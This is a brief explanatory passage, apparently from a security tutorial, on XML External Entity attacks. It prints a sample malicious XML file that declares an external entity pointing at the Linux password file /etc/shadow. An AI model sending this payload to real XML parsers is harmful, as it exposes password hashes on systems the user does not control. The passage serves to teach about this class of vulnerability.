XML External Entities

He crafts a malicious XML file with an external reference to the path /etc/shadow - a file that commonly holds password information on Linux systems. His hope is that when the XML is parsed, the parser will expand this file inline, revealing sensitive information to him.
The hacker executing his attack.
malicious.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
<!ENTITY passwords SYSTEM "file://etc/shadow">
]>
<xrds>
  &passwords;
</xrds>